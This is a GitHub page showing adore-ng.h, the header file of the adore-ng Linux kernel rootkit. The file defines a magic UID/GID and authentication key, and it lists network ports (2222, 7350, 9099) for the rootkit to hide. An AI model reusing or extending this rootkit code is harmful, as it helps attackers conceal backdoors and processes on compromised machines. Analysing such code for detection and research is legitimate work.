forked from yaoyumeng/adore-ng
-
Notifications
You must be signed in to change notification settings - Fork 0
/
adore-ng.h
63 lines (50 loc) · 1.52 KB
/
adore-ng.h
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
/*** (C) 2003-2005 by Stealth -- http://stealth.7350.org
***
***
*** (C)'ed Under a BSDish license. Please look at LICENSE-file.
*** SO YOU USE THIS AT YOUR OWN RISK!
*** YOU ARE ONLY ALLOWED TO USE THIS IN LEGAL MANNERS.
*** !!! FOR EDUCATIONAL PURPOSES ONLY !!!
***
*** -> Use ava to get all the things workin'.
***
*** Greets fly out to all my friends. You know who you are. :)
*** Special thanks to Shivan for granting root access to his
*** SMP box for adore-development. More thx to skyper for also
*** granting root access.
***
***/
#ifndef __ADORE_NG_H__
#define __ADORE_NG_H__
/* to check whether request is legal */
#define PF_AUTH 0x1000000
#ifndef ELITE_UID
#error "No ELITE_UID given!"
#endif
#ifndef ELITE_GID
#error "No ELITE_GID given!"
#endif
#ifndef ADORE_KEY
#error "No ADORE_KEY given!"
#endif
#define ADORE_VERSION CURRENT_ADORE
/* Very old kernels don't have an equivalent macro... */
#define LinuxVersionCode(v, p, s) (((v)<<16)+((p)<<8)+(s))
u_short HIDDEN_SERVICES[] =
{2222, 7350, 9099, 0};
/* END CHANGE SECTION */
struct task_struct *adore_find_task(pid_t);
int adore_atoi(const char *);
extern struct module *module_list;
#if defined LINUX26 || REDHAT9
#undef for_each_task
#define for_each_task for_each_process
#endif
/* This probably does not exactly belong to the kernel version but
* also to the GCC version used. Change here if it does not work
*/
#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,16)
//#define MODIFY_PAGE_TABLES
#undef MODIFY_PAGE_TABLES
#endif
#endif /* __ADORE_NG_H__ */